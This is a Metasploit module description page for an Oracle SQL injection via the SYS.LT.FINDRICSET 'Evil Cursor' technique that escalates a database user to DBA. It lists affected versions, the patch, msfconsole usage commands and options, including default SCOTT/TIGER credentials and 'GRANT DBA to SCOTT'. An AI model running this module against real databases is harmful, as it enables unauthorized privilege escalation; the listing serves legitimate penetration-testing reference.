Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method | Metasploit Exploit Database (DB)

Oracle DB SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method

This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.

Search Other Modules


Rank

  • Normal

Authors

  • CG < cg [at] carnal0wnage.com >

Vulnerability References


Development


Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use auxiliary/sqli/oracle/lt_findricset_cursor
msf auxiliary(lt_findricset_cursor) > set RHOST [TARGET IP]
msf auxiliary(lt_findricset_cursor) > run


Module Options

DBPASS The password to authenticate with. (default: TIGER)
DBUSER The username to authenticate with. (default: SCOTT)
RHOST The Oracle host. (default: )
RPORT The TNS port. (default: 1521)
SID The sid to authenticate with. (default: ORCL)
SQL SQL to execute. (default: GRANT DBA to SCOTT)
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module